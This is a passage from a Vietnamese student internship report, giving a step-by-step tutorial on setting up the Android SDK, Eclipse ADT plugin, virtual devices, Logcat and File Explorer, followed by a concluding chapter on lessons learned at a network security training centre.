Thực chất anh Giáp đã viết một bài có nội dung tương tự, nhưng do Goolge thay đổi

phương thức tải Android SDK nên mình quyết định viết lại, gộp luôn vào topic

hướng dẫn sử dụng Eclipse.

1.Download Android SDK:

Android SDK thực chất là tập hợp các công cụ và thư viện để phát triển các ứng

dụng trên nền tảng hệ điều hành Android.

B1: Vào trang http://developer.android.com/sdk/index.html để tải Android SDK

Starter. Tùy thuộc vào hệ điều hành mà bạn chọn bản Mac, Linux hay Window. Ở

đây mình chọn tải bản cho Window.


http://developer.android.com/sdk/index.html


B2: Giải nén file zip bạn vừa tải về. Chạy SDK Setup.exe. Bạn có thể gặp thông

báo lỗi Fetching https://dl - sl . .. Failed to fetch... Close thông báo này lại. Tiếp theo

cửa sổ Choose Packages to Install xuất hiện. Nếu cửa sổ này trống rỗng -> Cancel. -

> Quay về cửa sổ Android SDK and AVD manager -> Chọn Setting, đánh dấu vào

ô Force https://... -> Chọn Available Packages

B3: Đánh dấu các Packages bạn muốn tải: Documents chính là phần Javadoc mô tả

hoạt động của các phương thức và các lớp (phần này chắc chắn không thể thiếu rồi),

Sample là các đoạn code mẫu, SDK Platform ứng với các phiên bản hệ điều hành

(2.2 - API level 8, 2.1 - API level 7,...), và Google API để phát triển các phần mềm

liên quan đến dịch vụ của Google (như Google Map nếu bạn muốn lập trình liên

quan đến GPS).

Các bạn có thể tải hết nếu thích, còn muốn tối ưu thì có thể đánh dấu như mình

(lưu ý USB drivers chỉ dành cho người sử dụng Windows và muốn phát triển ứng


https://dl-sl/

https://dl-sl/

https://dl-sl/

https://dl-sl/


dụng test bằng điện thoại thật). -> Install Selected -> Install -> Cửa sổ Install hiện

ra-> Ngồi chờ (>_<)

3. Tích hợp Android SDK vào Eclipse:

B1: Tải Eclipse nếu bạn chưa có. Mọi người có thể phân vân không biết tải bản nào

cho phù hợp, nhưng theo ý kiến của mình thì có thể dùng 1 trong 2 bản sau: Eclipse

for Java Developers, hoặc Eclipse for Java and Report Developers (mình dùng bản

sau).

B2: Khởi chạy Eclipse, vào Help -> Install new softwares.

Chọn Add, gõ vào ô Name tên bạn muốn và Location gõ vào địa chỉ để tải về ADT:

HTML Code:

https://dl-ssl.google.com/android/eclipse/

hoặc

HTML Code:

http://dl-ssl.google.com/android/eclipse/



nếu https không hoạt động. Ngoài ra bạn cũng có thể tải thẳng ADT về máy theo

link http://dl.google.com/android/ADT - 0.9.7.zip (bản mới nhất 0.9.7 ứng với

Android 2.2), chọn Archive và browse tới file này (lưu ý không giải nén) -> OK -

> Check vào phần dưới ô Name (sẽ hiện ra dòng Developer Tools).

B3: Next, next, Accept, next,...Finish (như Install mọi chương trình bình thường).

B4: Eclipse -> Windows -> Preferences -> Android

Nhấn nút Browse và chỉnh đường dẫn tới thư mục của Android SDK bạn tải lúc

trước. -> Apply -> OK


http://dl.google.com/android/ADT-0.9.7.zip




4. Android Virtual Device:

AVD là máy ảo cho developer phát triển ứng dụng. Để tạo 1 AVD bạn vào

Windows -> Android SDK and AVD Manager -> Virtual Devices chọn New. ->

Cửa sổ Create new AVD hiện ra, bạn điền thông tin cho AVD bạn muốn:

Name: Tùy ý (nhưng chỉ được sử dụng các ký tự "a-z", "A-Z", ".-_", nghĩa là cả

khoảng trắng cũng ko đc).

Target: Chọn phiên bản hệ điều hành bạn muốn (thường mình tạo một Android 1.6

và một Android 2.2 để test).



SD Card: gõ vào Size SD card ảo cho AVD, hoặc chỉnh tới file đã có sẵn. Nhiều

AVD có thể dùng chung 1 Sdcard (chỉ cần tạo lần đầu, các lần sau chỉnh đường dẫn

tới file đó).

Skin: có thể để Default (HVGA) hoặc chọn kích cỡ màn hình bạn muốn. Chỉ cần

quan tâm tới 3 option: HVGA (phân giải 320-480 như G1, G2, i5700...), QVGA

(240-320 như HTC Wildfire...), WVGA854 (480-854 như Milestone, NexusOne...)

-> Create AVD.

2.1.1 Một số chức năng cần biết khi lập trình Android với

Eclipse:



Những điều mình nêu ra dưới đây đều là cơ bản, có thể các pro đã biết hết rồi,

nhưng như mình đã nói, bài này là dành cho newbie với hi vọng gia tăng kiến thức

cơ bản cùng giảm thời gian tìm kiếm cho các bạn.

5. Debug cho ứng dụng Android:

Nhiều người chuyển từ J2SE hoặc J2ME sang Android sẽ ngạc nhiên vì câu lệnh

debug kinh điển System.out.println() không còn in ra trên cửa sổ Console nữa.

Google đã thay thế nó bằng Logcat, một cửa sổ ghi lại toàn bộ hoạt động của hệ

điều hành. Để mở Logcat, trước tiên các bạn chọn Window -> Open Perspective ->

Debug. Nếu ko thấy option Debug thì chọn Other và tìm Debug trong cửa sổ mới

hiện ra. Sau đó chọn tab Debug mới xuất hiện ở góc trên bên phải của Eclipse (xem

hình). Theo kinh nghiệm của mình thì tốt nhất là Maximize Logcat ra luôn cho dễ

quan sát.

Cảm nhận ngày xưa khi mới sử dụng Logcat là rối và khó dùng. Nhưng càng về sau

mình càng quen và thấy nó tiện hơn Console nhiều, vì Console chỉ đưa ra thông báo

do chúng ta gọi, còn Logcat thì đưa cả luôn những thông báo của hệ điều hành, giúp

chúng ta nắm được hệ điều hành đang làm gì, gọi đến cái gì, khởi chạy những gì...



6. File Explorer của Android:

File Explorer là một chức năng hữu ích Google đưa vào giúp chúng ta quản lý file

trong sd card và cả file system data (chỉ quản lý được của emulator, không thể truy

nhập system data của thiết bị thật). FE giúp bạn dễ dàng đưa file vào / lấy file ra

trong sdcard ảo của emulator, xóa cơ sở dữ liệu của chương trình để khởi tạo lại

(only emulator)...

Mở FE bằng cách vào Window -> Show View -> Others -> Android -> File

Explorer. Mình để FE trong cửa sổ Debug cho tiện quản lý.





7. Tạo trang php

Trang tìm kiếm địa điểm



Đánh dấu những vị trí tìm được trên bản đồ



CHƯƠNG 3: TỔNG KẾT1. Những kết quả đạt được:

- Tuy thời gian thực tập tại Trung tâm an ninh mạng quốc tế ATHENA không

được nhiều nhưng cũng để lại trong em nhiều điều giá trị trong hành trang của

em sau này. Được sự giúp đỡ tận tình của thầy VÕ ĐỖ THẮNG là giảng viên

hướng dẫn và các anh chị nhân viên ở trung tâm trong suốt quá trình thực tập

đã giúp cho em học hỏi được thêm rất nhiều điều bổ ích. Những kĩ năng thực

hành của em tiến bộ hơn, bên cạnh đó cũng tích góp được nhiều bài học kinh

nghiệm. Chính vì vậy em đã đạt được các điều sau:

- Tìm hiểu rõ hơn về hệ điều hành Android khi em thực hiện đề tài nghiên

cứu về android trong quá trình thực tập.

- Học tập được các kỹ năng giao tiếp cơ bản, áp dụng cách thức làm việc

nhóm để nâng cao hiệu quả công việc được giao.

- Học được cách trình bày, diễn đạt trước mọi người cũng như trước ống

kính.

- Riêng về đề tài em nghiên cứu thì em thấy rằng mình đã có thể cài đặt và

chạy được HĐH Android cũng như các ứng dụng của nó một cách mượt mà

trên máy ảo.

- Bên cạnh đó, khi được tham gia vào các lớp học bảo mật win thì đã giúp

em phần nào biết thêm về cách thức tấn công cũng như làm việc của các

hacker.

2. Bài học kinh nghiệm cho bản thân:

- Mặc dù không được thực hành ở những môi trường đòi hỏi những kỹ năng

về phần cứng hay những công ty thực sự, em chỉ thực tập ở trung tâm đào tạo

về mạng nhưng đối với em thì để làm tốt công việc nói chung và ngành công

nghệ thông tin nói riêng thì điều cần thiết không chỉ có kiến thức lý thuyết mà

cần phải có kinh nghiệm thực tế. Kinh nghiệm thực tế ở đây chính là những

kinh nghiệm về kỹ năng mềm không được học tập một cách bài bản. Nó chính

là những vốn sống, ở đây chính là kỹ năng giao tiếp, kỹ năng ứng xử của mình

với mọi người cũng như là cách thức hoạt động nhóm hay hoạt động tập thể sẽ



giúp mình làm việc một cách hiệu quả hơn để đạt được những kết quả mà

mình mong đợi. Cũng như theo em nhận thấy ở những môi trường làm việc

sửa chữa trực tiếp các máy tính thì điều cần thiết để có thể giúp mình làm tốt

đó chính là những kiến thức thực tế, nếu bản thân chưa có được những kiến

thức đó thì chúng ta sẽ phải vận dụng đến vốn kiến thức về kỹ năng mềm của

chúng ta là học hỏi mọi người, giao tiếp và họp nhóm để có thể đạt được kết

quả tốt hơn. Chính vì vậy em nhận thấy rằng mình chẳng những phải trau dồi

những kiến thức trên cơ sở lý thuyết mà còn phải học hỏi thật nhiều kỹ năng

sống để có thể làm được những điều mà mình mong muốn.

3. Những điều chưa đạt được:

- Trong quá trình thực tập, còn một số đòi hỏi về yêu cầu của đề tài mà em vẫn

chưa thể làm được. Em vẫn chưa thể tìm hiểu thành công việc sử dụng mã độc

để nghe lén được các tin nhắn, các cuộc gọi trên các thiết bị di động thật.

- Em chưa có dịp tiếp xúc cũng như được làm việc với các khách hàng thực tế,

chưa được trải nghiệm việc đáp ứng thật tốt các nhu cầu và các yêu cầu mà

khách hàng đưa ra.
